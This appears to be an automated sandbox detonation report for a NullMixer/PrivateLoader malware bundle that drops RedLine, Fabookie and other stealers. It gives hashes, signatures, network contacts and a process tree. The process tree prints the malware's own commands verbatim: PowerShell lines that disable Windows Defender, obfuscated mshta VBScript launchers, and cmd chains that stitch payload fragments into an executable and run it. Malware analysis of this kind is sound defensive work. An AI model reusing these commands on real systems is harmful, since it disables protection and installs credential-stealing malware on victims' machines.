| SHA512 | 4bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 063b7b7f9c0886b614c653a6b7662a42 |
| SHA1 | 71cec24bca03a1c28886bf664897acbecb485989 |
| SHA256 | b26ffcf41deb034f51beab3f8093fa89b53007f2bdff9d42a7dd53dce88d1078 |
| SHA512 | 335debd30473e9f1497def7dcfa9f6c4f8ea156d1095c93427f22f937af7e4fc8bee9e75fc524201db56089eaa6366a09c64591c975636cb95336102cf2172ab |
memory/4788-254-0x0000000003120000-0x000000000327D000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\m9WDKH25.n
| MD5 | 102c7b74c9389ba3f6b3edc9d78354a5 |
| SHA1 | 1f87d39721fc1248b480f3d34f53fa06881a9e60 |
| SHA256 | a0c96cecc558707b247549e2a4543d354270f8747f2c493cd1be2adb332f991e |
| SHA512 | 9e404873661be23cd92eaada3eb8e16101df306af7eda46cc35a37c59131c1452ef50d465ef7f84a222fadf8821c24ffaa93e6b2c030ba93c44623aa7106077d |
C:\Users\Admin\AppData\Local\Temp\lPmE79O.f1
| MD5 | 3d4be60221c31167e0880e394bfc4da9 |
| SHA1 | 406ce7505abb85bfe841b043a3c0c9fc4accf6c5 |
| SHA256 | 736b628abd066f9bbc93148f2060e750fb8e7d1df03b6a5ab4501e1b0a7ac6db |
| SHA512 | b08998c99352173c7d016f344292362b31b66dcb78a333a4b0deb25c0abcfcade3db9687b6e1bf866d882a0c3490b2f5d7da1e4f460eff39745df823b93ce806 |
C:\Users\Admin\AppData\Local\Temp\AmtZY.zXT
| MD5 | 6dd35c1b829aa136dfa8d19a3d925b02 |
| SHA1 | 5443dde6e8c2948dfa2626d58c7cf957ea9fcd2c |
| SHA256 | 07e1aecb0743f29ce796de864144cfc7d64af919ca1445dc286d1be217a94298 |
| SHA512 | 536a26d31e795b8c7a8b3a4b8855465dd6b287410e2c2e41d7b5ed0dccff63757d50f3a6a85455537be16515064d801c04262b391e6a81d89540f88f6532072d |
C:\Users\Admin\AppData\Local\Temp\SVnzW.C2
| MD5 | 1046521a4754730fa8d91ffe7bb86dd7 |
| SHA1 | c588fef06fa101c894d165cf58b0d930b84f32bb |
| SHA256 | de20c6946360e923936c865b9d44e038e6046ca2c733043010913f3ed94ebfc5 |
| SHA512 | ec2ba5fde73358c65eec9e3dd61e32574a34ac580d2f0afb9f545818cbaedc2d7342f4e20dcb3e57250a1e350c3a9e05ab3fee0b3fe90feeb2fdbb34cb0654c8 |
C:\Users\Admin\AppData\Local\Temp\OJM3YR.x
| MD5 | 560cd503ea8d56af71af388068c37a0a |
| SHA1 | e33edf708a7dde97afca2f5dc04b3de35a55c5ad |
| SHA256 | f5ba7d73b7deed6a565cba19773085927dc34123633e466129a4a7a6be840cc4 |
| SHA512 | 52114327d022eeb3832742ad81b1881a8efe3e66632900298e59569cb44532aa06a63a3c65d5b1ab339b8e5e285b360584bbbe0c1db68442f478a24a81132996 |
memory/4788-259-0x0000000003630000-0x00000000036D7000-memory.dmp
memory/4788-260-0x00000000036E0000-0x0000000003774000-memory.dmp
memory/4788-263-0x00000000036E0000-0x0000000003774000-memory.dmp
memory/4788-261-0x00000000036E0000-0x0000000003774000-memory.dmp
memory/2892-265-0x0000000000400000-0x0000000000414000-memory.dmp
memory/1036-266-0x0000000000400000-0x00000000004BD000-memory.dmp
memory/864-270-0x0000000000400000-0x0000000000422000-memory.dmp
memory/4788-271-0x0000000003120000-0x000000000327D000-memory.dmp
memory/4788-280-0x00000000036E0000-0x0000000003774000-memory.dmp
memory/4788-282-0x0000000005740000-0x00000000057CD000-memory.dmp
memory/4788-281-0x0000000003780000-0x000000000573B000-memory.dmp
memory/4788-286-0x00000000057E0000-0x0000000005869000-memory.dmp
memory/4788-283-0x00000000057E0000-0x0000000005869000-memory.dmp
memory/4788-287-0x0000000000EA0000-0x0000000000EA1000-memory.dmp
memory/4788-288-0x0000000000EB0000-0x0000000000EB4000-memory.dmp
Analysis: behavioral5
Detonation Overview
Submitted
2024-11-10 17:24
Reported
2024-11-10 17:27
Platform
win7-20240708-en
Max time kernel
150s
Max time network
152s
Command Line
Signatures
Detect Fabookie payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Fabookie
Fabookie family
GCleaner
Gcleaner family
NullMixer
Nullmixer family
OnlyLogger
Onlylogger family
PrivateLoader
Privateloader family
RedLine
RedLine payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Redline family
OnlyLogger payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
ASPack v2.12-2.42
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Executes dropped EXE
Loads dropped DLL
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | iplogger.org | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 344 set thread context of 2780 | N/A | C:\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\Sat062000ca9aa6.exe | C:\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\Sat062000ca9aa6.exe |
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | N/A |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\control.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\Sat062000ca9aa6.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\setup_install.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\Sat0663b341399ee.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\Sat0675f75df01bdb.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\setup_installer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\H2LAVMGsZFX.EXe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\096fc162ed138cc3d9ee62631325c0d7d2957d6a1b7eec705da59004b83fd6c8.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\Sat0647140c100d63.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\Sat06f5ed0e3bb24.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\Sat0618d93ac2c5c.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\09xU.exE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\Sat0619212f22dd7.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\Sat062000ca9aa6.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Main | C:\Windows\SysWOW64\mshta.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\Sat06ebc37d1c94352.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\096fc162ed138cc3d9ee62631325c0d7d2957d6a1b7eec705da59004b83fd6c8.exe
"C:\Users\Admin\AppData\Local\Temp\096fc162ed138cc3d9ee62631325c0d7d2957d6a1b7eec705da59004b83fd6c8.exe"
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
C:\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\setup_install.exe
"C:\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\setup_install.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sat0663b341399ee.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sat062000ca9aa6.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sat0647140c100d63.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sat060fd7e42d2.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sat06f5ed0e3bb24.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sat0619212f22dd7.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sat06ebc37d1c94352.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sat0618d93ac2c5c.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sat0675f75df01bdb.exe
C:\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\Sat0647140c100d63.exe
Sat0647140c100d63.exe
C:\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\Sat06ebc37d1c94352.exe
Sat06ebc37d1c94352.exe
C:\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\Sat0663b341399ee.exe
Sat0663b341399ee.exe
C:\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\Sat0675f75df01bdb.exe
Sat0675f75df01bdb.exe
C:\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\Sat062000ca9aa6.exe
Sat062000ca9aa6.exe
C:\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\Sat0619212f22dd7.exe
Sat0619212f22dd7.exe
C:\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\Sat06f5ed0e3bb24.exe
Sat06f5ed0e3bb24.exe
C:\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\Sat0618d93ac2c5c.exe
Sat0618d93ac2c5c.exe
C:\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\Sat060fd7e42d2.exe
Sat060fd7e42d2.exe
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im "Sat0675f75df01bdb.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\Sat0675f75df01bdb.exe" & exit
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VbsCRiPT: cLosE (CrEaTeOBJeCt ( "WScrIPT.SheLL" ).RuN ("CMD.exe /c copy /y ""C:\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\Sat0663b341399ee.exe"" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If """" =="""" for %U iN ( ""C:\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\Sat0663b341399ee.exe"") do taskkill /F -Im ""%~NxU"" " , 0 , tRUe) )
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vBscRIpT: ClOsE(CReAteObJect("WScRipT.ShELL" ).RUn ( "CMd.eXE /Q /c cOpY /y ""C:\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\Sat06f5ed0e3bb24.exe"" H2LAVMGsZFX.EXe && sTArt H2LaVMGSzFX.eXE /paMxRK9ViV3PT5Jnz5&if """"== """" for %z in ( ""C:\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\Sat06f5ed0e3bb24.exe"" ) do taskkill -Im ""%~nXz"" /F ", 0 , TrUe ) )
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2824 -s 272
C:\Windows\SysWOW64\taskkill.exe
taskkill /im "Sat0675f75df01bdb.exe" /f
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /Q /c cOpY /y "C:\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\Sat06f5ed0e3bb24.exe" H2LAVMGsZFX.EXe && sTArt H2LaVMGSzFX.eXE /paMxRK9ViV3PT5Jnz5&if ""== "" for %z in ( "C:\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\Sat06f5ed0e3bb24.exe" ) do taskkill -Im "%~nXz" /F
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\Sat0663b341399ee.exe" 09xU.exE &&STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If "" =="" for %U iN ( "C:\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\Sat0663b341399ee.exe") do taskkill /F -Im "%~NxU"
C:\Users\Admin\AppData\Local\Temp\H2LAVMGsZFX.EXe
H2LaVMGSzFX.eXE /paMxRK9ViV3PT5Jnz5
C:\Windows\SysWOW64\taskkill.exe
taskkill -Im "Sat06f5ed0e3bb24.exe" /F
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vBscRIpT: ClOsE(CReAteObJect("WScRipT.ShELL" ).RUn ( "CMd.eXE /Q /c cOpY /y ""C:\Users\Admin\AppData\Local\Temp\H2LAVMGsZFX.EXe"" H2LAVMGsZFX.EXe && sTArt H2LaVMGSzFX.eXE /paMxRK9ViV3PT5Jnz5&if ""/paMxRK9ViV3PT5Jnz5""== """" for %z in ( ""C:\Users\Admin\AppData\Local\Temp\H2LAVMGsZFX.EXe"" ) do taskkill -Im ""%~nXz"" /F ", 0 , TrUe ) )
C:\Users\Admin\AppData\Local\Temp\09xU.exE
09xU.EXE -pPtzyIkqLZoCarb5ew
C:\Windows\SysWOW64\taskkill.exe
taskkill /F -Im "Sat0663b341399ee.exe"
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VbsCRiPT: cLosE (CrEaTeOBJeCt ( "WScrIPT.SheLL" ).RuN ("CMD.exe /c copy /y ""C:\Users\Admin\AppData\Local\Temp\09xU.exE"" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If ""-pPtzyIkqLZoCarb5ew "" =="""" for %U iN ( ""C:\Users\Admin\AppData\Local\Temp\09xU.exE"") do taskkill /F -Im ""%~NxU"" " , 0 , tRUe) )
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /Q /c cOpY /y "C:\Users\Admin\AppData\Local\Temp\H2LAVMGsZFX.EXe" H2LAVMGsZFX.EXe && sTArt H2LaVMGSzFX.eXE /paMxRK9ViV3PT5Jnz5&if "/paMxRK9ViV3PT5Jnz5"== "" for %z in ( "C:\Users\Admin\AppData\Local\Temp\H2LAVMGsZFX.EXe" ) do taskkill -Im "%~nXz" /F
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Local\Temp\09xU.exE" 09xU.exE &&STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If "-pPtzyIkqLZoCarb5ew " =="" for %U iN ( "C:\Users\Admin\AppData\Local\Temp\09xU.exE") do taskkill /F -Im "%~NxU"
C:\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\Sat062000ca9aa6.exe
C:\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\Sat062000ca9aa6.exe
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vbScRipT: cloSE ( creAteobjECT ( "WscriPT.SHell" ). RuN ( "cMd.exE /Q /r eCHO | SET /P = ""MZ"" > ScMeAP.SU & CoPY /b /Y ScMeAp.SU + 20L2VNO.2 + gUVIl5.SCH + 7TCInEJp.0 + yKIfDQA.1 r6f7sE.I & StART control .\R6f7sE.I " ,0,TRuE) )
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VbsCRIpt: cLosE( CREAteobjEcT( "WscRiPt.SHeLl" ). rUN ("C:\Windows\system32\cmd.exe /Q /r eCho NqN%TIME%> FvfG42h.8 & echo | Set /P = ""MZ"" > IiKZCUV.MQ& CoPY /Y /b iIKZCUV.MQ + 6H87pFZ.4 + FDKD47Ef.I1 + U56d.R + JB946RB.I7A + Q_tW.pL + BTDIJ1.FYL + FVfg42H.8 XHnbBPN.0kM & StArT msiexec.exe /y .\xHnBBPN.0kM " ,0 ,True ) )
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /Q /r eCHO | SET /P = "MZ" > ScMeAP.SU &CoPY /b /Y ScMeAp.SU + 20L2VNO.2 + gUVIl5.SCH +7TCInEJp.0 + yKIfDQA.1 r6f7sE.I& StART control .\R6f7sE.I
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" eCHO "
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /Q /r eCho NqN%TIME%> FvfG42h.8& echo | Set /P = "MZ" > IiKZCUV.MQ& CoPY /Y /b iIKZCUV.MQ +6H87pFZ.4 +FDKD47Ef.I1+U56d.R+ JB946RB.I7A + Q_tW.pL+BTDIJ1.FYL+ FVfg42H.8 XHnbBPN.0kM & StArT msiexec.exe /y .\xHnBBPN.0kM
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" SET /P = "MZ" 1>ScMeAP.SU"
C:\Windows\SysWOW64\control.exe
control .\R6f7sE.I
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo "
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" Set /P = "MZ" 1>IiKZCUV.MQ"
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL .\R6f7sE.I
C:\Windows\SysWOW64\msiexec.exe
msiexec.exe /y .\xHnBBPN.0kM
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2796 -s 440
C:\Windows\system32\RunDll32.exe
C:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL .\R6f7sE.I
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 .\R6f7sE.I
Network
| Country | Destination | Domain | Proto |
| NL | 45.133.1.107:80 | | tcp |
| US | 8.8.8.8:53 | gazrxlog.xyz | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | whealclothing.xyz | udp |
| US | 8.8.8.8:53 | my-all-group.bar | udp |
| US | 8.8.8.8:53 | m525-blockchain31432.bar | udp |
| FR | 91.121.67.60:23325 | | tcp |
| US | 8.8.8.8:53 | iplogger.org | udp |
| US | 104.26.2.46:443 | iplogger.org | tcp |
| US | 104.26.2.46:443 | iplogger.org | tcp |
| US | 8.8.8.8:53 | pastebin.com | udp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 8.8.8.8:53 | wfsdragon.ru | udp |
| US | 172.67.133.215:80 | wfsdragon.ru | tcp |
| FR | 51.178.186.149:80 | | tcp |
| FR | 91.121.67.60:23325 | | tcp |
| N/A | 127.0.0.1:49275 | | tcp |
| N/A | 127.0.0.1:49277 | | tcp |
| FR | 91.121.67.60:23325 | | tcp |
| FR | 91.121.67.60:23325 | | tcp |
| US | 72.84.118.132:8080 | | tcp |
| FR | 91.121.67.60:23325 | | tcp |
| US | 72.84.118.132:8080 | | tcp |
| FR | 91.121.67.60:23325 | | tcp |
Files
\Users\Admin\AppData\Local\Temp\setup_installer.exe
| MD5 | c93901703b1d556d494f7a31ffb04720 |
| SHA1 | d14e2dc239ac85e6020f1fc4c035f7d2ea72d262 |
| SHA256 | 0d5b2226f4199a3891ec836c5b54023595b4aa06d4a80e816a8d6545a0bb3631 |
| SHA512 | 3e31e881d7b7c74baa5ea0e8d97f86dfc6feb06ec7061f30891b7736477f2888fdb58ccaa4d8ea764249191c89e5897954515b6bfdfe6a45d51640c63c20e900 |
\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\setup_install.exe
| MD5 | a979670adefae9ab376382f3229f3f28 |
| SHA1 | 5b5b75a789e46a2f8ac02fba3d895fa968387c9b |
| SHA256 | a8ae45e63487b6dd93bf61429d996be4abc922785e893717cdecd84b0b6f2040 |
| SHA512 | f023b21556d5ba5cd747f02ccc99ee1a27fea1d1c675615efa31664301b53dacb253f1b92356a8aea7ab0eba77e89d0fea7d0ba088bc17599fe55278e0fb744b |
\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\libcurl.dll
| MD5 | d09be1f47fd6b827c81a4812b4f7296f |
